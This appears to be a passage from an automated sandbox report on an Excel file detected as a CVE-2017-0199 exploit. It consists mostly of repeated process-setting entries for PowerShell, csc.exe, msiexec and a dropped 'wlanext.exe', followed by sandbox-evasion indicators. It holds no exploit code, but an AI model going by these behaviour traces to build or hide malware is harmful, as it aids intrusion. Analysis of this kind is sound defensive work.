        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxStream path 'Workbook' entropy: 7.97427782601 (max. 8.0)
        Source: C0230000.0.drStream path 'Workbook' entropy: 7.97399110603 (max. 8.0)

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1466Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6316Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2752Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3611Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3349Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6548Jump to behavior
